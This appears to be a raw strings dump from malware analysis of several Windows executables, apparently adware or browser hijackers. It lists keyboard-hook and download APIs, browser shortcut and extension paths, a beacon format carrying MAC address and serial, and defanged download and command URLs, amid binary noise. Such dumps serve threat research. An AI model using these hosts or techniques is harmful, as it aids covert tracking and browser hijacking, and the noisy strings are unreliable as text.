zui_E8*E8*E8*E8*E8*F9 E8*E8*E8*E8*E8*E8*E8*E8*E8*E8*E8*F9 F9 F9 F9 F9 G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,E:,E:,G:,G:,G:,F9 F9 F9 F9 F9 F9 F9 F9 G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:*H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,J; J; J; J; J; J; J; J; J; J; J; J; J; J; J; K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,J; J; J; J; J; J; J; J; J; J; J; J; J; J; J; K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-K<,K<,K<,K<,K<,K<,K<,K<,L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-M=-M=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/O?.O?.O?.O?.O?.O?.O?.O?.O?.O?.O?.O?.O?.O?.N>-N>-O?.O?.O?.O?.O?.O?.O?.O?.O?.O?.O?.O?.O?.N>-N>-N>-O?.O?.O?.O?.O?.O?.O?.O?.O?.O?.P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/RA.RA.R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/SA0SA0SA0SA0SA0TB1TB1TB1TB1TB1TB1TB1TB1SA0SA0SA0SA0SA0SA0SA0SA0R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/P@/P@/QB/QB/QB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/QB/QB/QB/QB/QB/QB/QB/QB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.PA.RA.RA.RA.RA.RA.RA.RA.RA.RA.PA.PA.PA.
=5(;4$=5(=4'<4':4)=4&
;2(:1':1'<2(:1';2(:0&<2(:1'
KWindows
eEWB.IEConst
0IdHTTPHeaderInfo
 IdTCPServer
IdTCPStream
Font.Charset
Font.Color
Font.Height
Font.Name
Font.Style
PrintOptions.HTMLHeader.Strings
PrintOptions.Orientation
ProxyParams.BasicAuthentication
ProxyParams.ProxyPort
Request.ContentLength
Request.ContentRangeEnd
Request.ContentRangeStart
Request.ContentType
Request.Accept
Request.BasicAuthentication
Request.UserAgent
7Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTPOptions
RegEnumKeyExA
GetWindowsDirectoryA
RegCloseKey
MsgWaitForMultipleObjects
mtcP=
1.DWW
Mp.ns
NWEb
RegCreateKeyExA
RegDeleteKeyA
ActivateKeyboardLayout
user32.dll
gdi32.dll
wininet.dll
GetKeyNameTextA
LoadKeyboardLayoutA
RegQueryInfoKeyA
InternetOpenUrlA
&{.WE
{w3?.zg8
%D];SJ
SetWindowsHookExA
iphlpapi.dll
GetKeyboardLayoutList
GetCPInfo
MapVirtualKeyA
EnumWindows
RegFlushKey
ShellExecuteA
GetKeyboardState
GetKeyboardLayout
EnumThreadWindows
version.dll
SetViewportOrgEx
GetKeyState
CreateIoCompletionPort
RegOpenKeyExA
SHFileOperationA
?qwshell32.dll
advapi32.dll
UnhookWindowsHookEx
DeleteUrlCacheEntry
GetKeyboardType
.SL3W
 w.DN
%S6Ww
YU.jf*
_.YRR6
6.Sre
|3}V.Jx(i-
3.CA{
.XDf-[o
fq.wc
E.iFX
n>=E.ky7
'.xhp~
%R.KJ
zA.XNp
9W.OMO
%x*{je
V.Sao
7keYT
jÚx:
X6.jGTG
.pvimsh
z_.AEQ
yB%U2Oj
U4.wo
Sm.ys
'*e%F
3".Ar
errorUrl
1.0.0.15
1.0.0.0820
JPEG error #%d
Error creating SSL context. Could not load root certificate.
Could not load certificate.#Could not load key, check password.
SSL status: "%s"
Request rejected or failed.5Request rejected because SOCKS server cannot connect.QRequest rejected because the client program and identd report different user-ids.
Command not supported.
Address type not supported.$Error accepting connection with SSL.
Socket is not connected..Cannot send or receive after socket is closed.#Too many references, cannot splice.
Operation now in progress.
Operation already in progress.
Socket operation on non-socket.
Protocol not supported.
Socket type not supported."Operation not supported on socket.
Protocol family not supported.0Address family not supported by protocol family.
Chunk StartedDThis authentication method is already registered with class name %s.
%s is not a valid service.
Socket Error # %d
%s is not a valid IP address.
Operation would block.
File "%s" not found1Only one TIdAntiFreeze can exist per application."%d: Circular links are not allowed
No data to read.$Can not bind in port range (%d - %d)
Invalid Port Range (%d - %d)
Max line length exceeded.*Error on call Winsock2 library function %s&Error on loading Winsock2 library (%s)
Resolving hostname %s.
Connecting to %s.
.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters
OLE control activation failed*Could not obtain OLE control window handle%License information for %s is invalidPLicense information for %s not found. You cannot use this control in design modeNUnable to retrieve a pointer to a running object registered with OLE for %s/%s
Connection Closed Gracefully.;Could not bind socket. Address and port are already in use.4Failed attempting to retrieve time zone information.
No help keyword specified.
Alt  Clipboard does not support Icons
Cannot open clipboard/Menu '%s' is already being used by another form
No help found for %s#No context-sensitive help installed$No topic-based help system installed
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Thread creation error: %s
Thread Error: %s (%d)
Scan line index out of range!Cannot change the size of an icon Invalid operation on TOleGraphic
Unsupported clipboard format
$''%s'' is not a valid component name
Invalid data type for '%s' List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream
Error reading %s%s%s: %s
Failed to create key %s
Failed to get data for '%s'
Failed to set data for '%s'
Resource %s not found
Ancestor for '%s' not found
Cannot assign a %s to a %s
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Unable to write to %s
Operation not supported
External exception %x
Interface not supported
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Integer overflow Invalid floating point operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
!'%s' is not a valid integer value('%s' is not a valid floating point value
'%s' is not a valid date
'%s' is not a valid time!'%s' is not a valid date and time
I/O error %d

fm4svr.exe_1392_rwx_0058F000_00001000:




iphlpapi.dll
comctl32.dll
GetKeyboardLayoutList

fm4svr.exe_1392_rwx_00592000_00002000:




URLMON.DLL
EnumWindows
RegFlushKey
ShellExecuteA
GetKeyboardState
GetKeyboardLayout
EnumThreadWindows
version.dll

a-zm-157391-v5.exe_2236:




.text
`.rdata
@.data
.rsrc
GetProcessHeap
KERNEL32.dll
USER32.dll
RegCreateKeyExW
RegOpenKeyExW
RegCloseKey
ADVAPI32.dll
ShellExecuteW
SHFileOperationW
SHELL32.dll
ole32.dll
GdiplusShutdown
gdiplus.dll
WS2_32.dll
MSVCP60.dll
COMCTL32.dll
MSVCRT.dll
_acmdln
InternetOpenUrlW
WININET.dll
SHLWAPI.dll
PSAPI.DLL
iphlpapi.dll
reportname
appurl
User-Agent: Mozilla/4.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/msword, application/vnd.ms-powerpoint, */*
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
xxxxxx
\kpfldahabkinpppnmpmcbfjbbphcafgm\1.0.0_0\js\index.js
dh.html
%XX]F
.CxN|
}%Xm:
oK.zH.)P&th
.Uh j
.kc#T
a.fx*
t:.BU
&D*-W}
HZ.Nn
w3.AC
@I2a%C
z^3M%x
a8$.pjTK
BH.Ly
ft.Xo
vEK(.LvR
jQ.BEq
I>]o#o%d
}1[-<{,7
W>{.bh
#R.dM
*'1}6!6;
8~.dD
C$.Yw
y.Kz?
&WL7:.zf
'y%FGc
%xd{gT
-fz%f
%Ds 40m
.fnvV
..qkw
.dr3k?u
&W'%D
~-D}-
Wg1%cn
f).QA
e.Bj8%
^X.xo
WEb?y
fgv%C
)p%U`3i
a8%F\
RWeb
uDp)]
,%xib
.Mc,n`y
].trj$
%Sb=Z
.iQyH
K.GzZ
%x3V,
|%csw
.Kh#]|
%.JTC
um.FZ
63U.ata
%sHNy]$
M8.id
.st)N
@=.BC
d,%xoS
fSv%C~
.sP%ibE,I
4gL%U
a%s\%s
%s\%s inst
%s\install_%d.tmp
Mozilla Firefox.lnk
Google Chrome.lnk
%sext.7z
Software\Microsoft\Windows\CurrentVersion\Uninstall\
{871C5380-42A0-1069-A2EA-08002B30309D}
Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel
SoftWare\Microsoft\Windows\CurrentVersion\Uninstall\
\config.ini
6.link
IEXPLORE.EXE
FIREFOX.EXE
OPERA.EXE
THEWORLD.EXE
//./%s
%s\%s.lnk
%s\jx\ExtractFiles
%s\Microsoft\Internet Explorer\Quick Launch\%s.lnk
data=pid=%s
sn=%s
mac=%s
sign=%s
pid=%s&sn=%s&mac=%s&sk=%s
M-%.2d-%.2d
%ProgramFiles%\Internet Explorer\iexplore.exe
\Internet Explorer.lnk
xxxxxxxxxxxxxxxx
\360Chrome\Chrome\User Data\Default
\Google\Chrome\User Data\Default
%s\Preferences
%s\Extensions
%Program Files%\jstm
%Program Files%\fjwyusp\a-zm-157391-v5.exe
1.1.0.3
juese.exe
unist.exe

FHSev.exe_2328:




.idata
.rdata
P.FMS0
`.rsrc
P.FMS1
kernel32.dll
Windows
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
EVariantBadIndexError
ssShift
htKeyword
EInvalidOperation
u%CNu
%s[%d]
%s_%d
EInvalidGraphicOperation
USER32.DLL
comctl32.dll
uxtheme.dll
DragKindH%C
OnKeyDown
OnKeyPress
OnKeyUp
Proportional
%s%s%s%s%s%s%s%s%s%s
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
ControlsL%C
TKeyEvent
TKeyPressEvent
HelpKeyword
crSQLWait
%s (%s)
imm32.dll
AutoHotkeys
ssHotTrack
TWindowState
poProportional
TWMKey
KeyPreview
WindowState
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
User32.dll
Password
OnExecutex
advapi32.dll
%s, ClassID: %s
ole32.dll
PSAPI.dll
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
[(*&[^%$#]@!)]
SysConfig.ini
~nB%uN
<requestedExecutionLevel level="requireAdministrator"/>
KWindows
UrlMon
UnhookWindowsHookEx
ReportEventA
GetKeyboardLayout
iphlpapi.dll
EnumWindows
@N.zL>
R.KC4~.
n.SX"
:z.nq
%f,V$
1.Pfh
o`.wv
GetKeyState
ActivateKeyboardLayout
GetWindowsDirectoryA
URLMON.DLL
GetKeyNameTextA
EnumThreadWindows
URLDownloadToFileA
RegCloseKey
SetViewportOrgEx
SetWindowsHookExA
!%.IZVrt
wininet.dll
MapVirtualKeyA
gdi32.dll
GetKeyboardLayoutList
'.Qapr
GetKeyboardState
%##,<`[~
user32.dll
InternetOpenUrlA
RegOpenKeyExA
GetKeyboardType
version.dll
LoadKeyboardLayoutA
)%.CI
GetCPInfo
( (=8{[;
MsgWaitForMultipleObjects
SELECT * FROM __InstanceOperationEvent WITHIN 1 WHERE TargetInstance ISA
1.0.0.0
1.0.0.0818 - 2
NUnable to retrieve a pointer to a running object registered with OLE for %s/%s
No help keyword specified.
OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters
/Service "%s" failed to install with error: "%s" Service uninstalled successfully1Service "%s" failed to uninstall with error: "%s"
No help found for %s#No context-sensitive help installed$No topic-based help system installed
Alt  Clipboard does not support Icons
Cannot open clipboard/Menu '%s' is already being used by another form
Service failed on %s: %s
shutdown(Service failed in custom message(%d): %s
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
Thread creation error: %s
Thread Error: %s (%d)
Unsupported clipboard format
$''%s'' is not a valid component name
Invalid property value List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream
Error reading %s%s%s: %s
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Ancestor for '%s' not found
Cannot assign a %s to a %s
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Unable to write to %s
Operation not supported
External exception %x
Interface not supported
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Integer overflow Invalid floating point operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
!'%s' is not a valid integer value('%s' is not a valid floating point value
'%s' is not a valid date
'%s' is not a valid time!'%s' is not a valid date and time
I/O error %d

FHSev.exe_2328_rwx_004BA000_00001000:




32.dll
InternetOpenUrlA
RegOpenKeyExA
GetKeyboardType
version.dll
LoadKeyboardLayoutA

juese.exe_2488:




.text
`.rdata
@.data
.rsrc
@.reloc
tFHt:Ht.Ht"Hu`
t'SShl
tWSShW
tl9_ tgSSh
SSSSh OY
u$SShe
j%XtL9E
tAHt.HHt
<SShG
FtPW
SSh@B
FTCP
u.PhL
s%j.Zf
User-Agent: Mozilla/4.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/msword, application/vnd.ms-powerpoint, */*
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
xxxxxx
reportname
appurl
CCmdTarget
CNotSupportedException
RegOpenKeyTransactedW
RegCreateKeyTransactedW
RegDeleteKeyTransactedW
RegDeleteKeyExW
TaskDialogIndirect
CMDITabProxyWnd
CMDIChildWndEx
CMDIFrameWndEx
CMDIChildWnd
CMDIFrameWnd
CMDIClientAreaWnd
CMFCToolBarsKeyboardPropertyPage
GetProcessWindowStation
operator
Visual C   CRT: Not enough memory to complete call to strerror.
Broken pipe
Inappropriate I/O control operation
Operation not permitted
E:\TM-Clients\WuZun\Code\20140607sctx_Src\Release\juese.pdb
GetWindowsDirectoryW
GetCPInfo
KERNEL32.dll
GetKeyState
GetAsyncKeyState
CreateDialogIndirectParamW
UnhookWindowsHookEx
SetWindowsHookExW
MapVirtualKeyW
GetKeyNameTextW
GetKeyboardLayout
GetKeyboardState
MapVirtualKeyExW
USER32.dll
GetViewportExtEx
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportOrgEx
GDI32.dll
MSIMG32.dll
COMDLG32.dll
WINSPOOL.DRV
RegCloseKey
RegDeleteKeyW
RegCreateKeyExW
RegOpenKeyExW
RegEnumKeyExW
RegEnumKeyW
ADVAPI32.dll
ShellExecuteW
SHELL32.dll
COMCTL32.dll
SHLWAPI.dll
ole32.dll
OLEAUT32.dll
oledlg.dll
GdiplusShutdown
gdiplus.dll
WS2_32.dll
InternetOpenUrlW
WININET.dll
IPHLPAPI.DLL
OLEACC.dll
IMM32.dll
WINMM.dll
.?AVCCmdTarget@@
.PAVCException@@
.?AVCWebUIController@@
.?AVCTestCmdUI@@
.?AVCCmdUI@@
.PAVCUserException@@
.PAVCMemoryException@@
.PAVCResourceException@@
.PAVCSimpleException@@
.PAVCObject@@
.PAVCNotSupportedException@@
.PAVCInvalidArgException@@
.?AVCNotSupportedException@@
.PAVCOleException@@
.PAVCFileException@@
.PAVCArchiveException@@
.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@
.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@
.PAVCOleDispatchException@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WV12@PB_W@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WPAVCDocument@@PAV3@@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W_N_N@@
.?AV?$CMap@PAVCDocument@@PAV1@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W@@
.?AVCMDITabProxyWnd@@
.?AVCMDIChildWndEx@@
.?AVCMDIChildWnd@@
.?AVCMDIFrameWndEx@@
.?AVCMDIFrameWnd@@
.?AVCMFCToolBarCmdUI@@
.?AVCMFCAcceleratorKey@@
.?AVCMFCColorBarCmdUI@@
.?AV?$CMap@KKV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W@@
.?AV?$CList@PAVCMDIChildWndEx@@PAV1@@@
.?AVCMDIClientAreaWnd@@
.?AVCMFCRibbonCmdUI@@
.?AVCMFCCmdUsageCount@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WPAVCObList@@PAV3@@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WHH@@
.?AVCMFCRibbonKeyTip@@
.?AVCMFCToolBarsKeyboardPropertyPage@@
.?AVCMFCTasksPaneToolBarCmdUI@@
.?AVCMFCAcceleratorKeyAssignCtrl@@
zcÁ
.LS}X
a:,v%c
a8%F\
RWeb
uDp)]
,%xib
.Mc,n`y
].trj$
%Sb=Z
.iQyH
K.GzZ
> >$>(>,>0>4>8><>
;#;*;7;?;
89T9{9
: :$:(:,:0:4:8:
6d6C6R6^6j6w6
6#7>7[7}7
1,2m2w2
1=3K3[3
1,2v2
%0U0d0p0
3 3$3(3,3
4 5$5(5,5
7 7$7(7,70747
2 2$2(2,2024282
? ?$?(?,?0?4?
:(:0:<:`:
7(7<7\7|7
8 8$8(8,8084888<8\8
;$;(;0;4;\;
%s\%s
{871C5380-42A0-1069-A2EA-08002B30309D}
Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel
@SoftWare\Microsoft\Windows\CurrentVersion\Uninstall\
\jstm\config.ini
//./%s
%s\%s.lnk
%s\Microsoft\Internet Explorer\Quick Launch\%s.lnk
juese.exe
%ProgramFiles%\Internet Explorer\iexplore.exe
\Internet Explorer.lnk
xxxxxxxxxxxxxxxx
Internet Explorer.lnk
data=pid=%s
sn=%s
mac=%s
sign=%s
pid=%s&sn=%s&mac=%s&sk=%s
M-%.2d-%.2d
@%s (%s:%d)
%s (%s:%d)
%Program Files%\Microsoft Visual Studio 10.0\VC\atlmfc\include\afxwin1.inl
Mozilla Firefox.lnk
Google Chrome.lnk
tonnn.com/client/jstm/
hXXp://VVV.
accKeyboardShortcut
wuser32.dll
hhctrl.ocx
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
Afx:%p:%x:%p:%p:%p
Afx:%p:%x
commctrl_DragListMsg
Acomctl32.dll
Acomdlg32.dll
Ashell32.dll
Bf:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_s.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\viewcore.cpp
Bf:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\viewform.cpp
mfcm100u.dll
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Software\Microsoft\Windows\CurrentVersion\Policies\Network
Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32
KERNEL32.DLL
%s%s.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appcore.cpp
lX-X-x-XX-XXXXXX
Advapi32.dll
kernel32.dll
Cf:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winfrm.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp
SHELL32.DLL
lXXxXXXXXXXX
dwmapi.dll
UxTheme.dll
eShell32.dll
%s:%x:%x:%x:%x
MFCLink_UrlPrefix
MFCLink_Url
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olestrm.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl2.cpp
COMCTL32.DLL
USER32.DLL
%sMFCToolBar-%d%x
%sMFCToolBar-%d
%sMFCToolBarParameters
TOOLBAR_RESETKEYBAORD
KeyboardManager
MSG_CHECKEMPTYMINIFRAME
%sDockingManager-%d
&%d %s
JHex={X,X,X}
ShowCmd
%sMDIClientArea-%d
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oleipfrm.cpp
%sBasePane-%d%x
%sBasePane-%d
KExecute
%sPane-%d%x
%sPane-%d
N%sMFCOutlookBar-%d%x
%sMFCOutlookBar-%d
%c%d%c%s
RGB(%d, %d, %d)
%sDockablePaneAdapter-%d%x
%sDockablePaneAdapter-%d
ENABLE_KEYS
KEYS_MENU
KEYS
PRICHED20.DLL
windows
Pf:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledrop2.cpp
%sMFCTasksPane-%d%x
%sMFCTasksPane-%d
mscoree.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
%Program Files%\
%Program Files%\jstm
%Program Files%\jstm\juese.exe
{8856F961-340A-11D0-A96B-00C04FD705A2}
1.1.0.0
All Files (*.*)
No error message is available.#Attempted an unsupported operation.$A required resource was unavailable.
Command failed.)Insufficient memory to perform operation.PSystem registry entries have been removed and the INI file (if any) was deleted.BNot all of the system registry entries (or INI file) were removed.FThis program requires the file %s, which was not found on this system.tThis program is linked to the missing export %s in the file %s. This machine may have an incompatible version of %s.
Destination disk drive is full.5Unable to read from %1, it is opened by someone else.AUnable to write to %1, it is read-only or opened by someone else.1Encountered an unexpected error while reading %1.1Encountered an unexpected error while writing %1.
#Unable to load mail system support.
Note that if you choose to recover the auto-saved documents, you must explicitly save them to overwrite the original documents. If you choose to not recover the auto-saved versions, they will be deleted.fRecover the auto-saved documents
%s [Recovered]

ignite.exe_2576:




.text
`.data
.rsrc
MSVBVM60.DLL
6.vmmvv
pVVV.6
H.yyywsTSTpxyyywfP
SHDocVwCtl.WebBrowser
#vb6chs.dll
shdocvw.dll
WebBrowser
%System%\mshtml.tlb
%Program Files%\VB
\VB6.OLB
0%System%\shdocvw.oca
winmm.dll
time.dll
advapi32.dll
RegCloseKey
GetUrlSource
RegCreateKeyA
RegOpenKeyA
wininet.dll
InternetOpenUrlA
VBA6.DLL
%System%\msvbvm60.dll\3
Password
WebBrowser2
WebBrowser1
)o4.tr
sUrl
sSrvCmd
sSrvPassword
\journey.exe
\kindness.exe
\kingdom.exe
\knack.exe
\knead.exe
\knee.exe
\time.dll
\weathers.exe
hXXp://mini.yoyolm.net/ta2/?flag=
hXXp://mini.yoyolm.net/ta3/?flag=
hXXp://time.yoyolm.net/newh1/
hXXp://time.yoyolm.net/newh2/
hXXp://time.yoyolm.net/newh3/
hXXp://mini.yoyolm.net/new/
\setings.ini
hXXp://mini.yoyolm.net/ta1/?flag=
(C) hXXp://VVV.tqshopping.com/
manual.exe

ignite.exe_2576_rwx_012F1000_00018000:




%SQVW
<.tBwIJ;
<.tC<9w:<0r6,0f
WinHttp.WinHttpRequest.5.1
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
kernel32.dll
hXXp://VVV.baidu.com/
msvcrt.dll
NTSHRUI.DLL
COMCTL32.DLL
shell32.dll
\QZaweewertghebh.dat
WScript.Shell
WScript.Shell_ERR
setting.ini
set.ini
Software\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE
VBScript.RegExp
RegOpenKeyExA
CreateDialogIndirectParamA
ExitWindowsEx
SetWindowsHookExA
UnhookWindowsHookEx
A.eMk$)B$)B$)B$)B$)B$)B$)B2$!
.text
`.data
.link
.rloc
NTSHRUI.DL
.lnk[she
.baidu.
KeyG
.dN"u
.linke

mankind.exe_2904:




.text
`.data
.rsrc
GDIPLUS.DLL
gdi32.dll
kernel32.dll
NTDLL.DLL
user32.dll
MSVBVM60.DLL
6.vmmvv
pVVV.6
H.yyywsTSTpxyyywfP
SHDocVwCtl.WebBrowser
.aicAlphaImage
.ucListBox
iTXtXML:com.adobe.xmp
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmpMM:InstanceID="xmp.iid:81BD8030114B11E38938CDD8DE466017" xmpMM:DocumentID="xmp.did:81BD8031114B11E38938CDD8DE466017"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:81BD802E114B11E38938CDD8DE466017" stRef:documentID="xmp.did:81BD802F114B11E38938CDD8DE466017"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
2014-03-08
.ucShadow
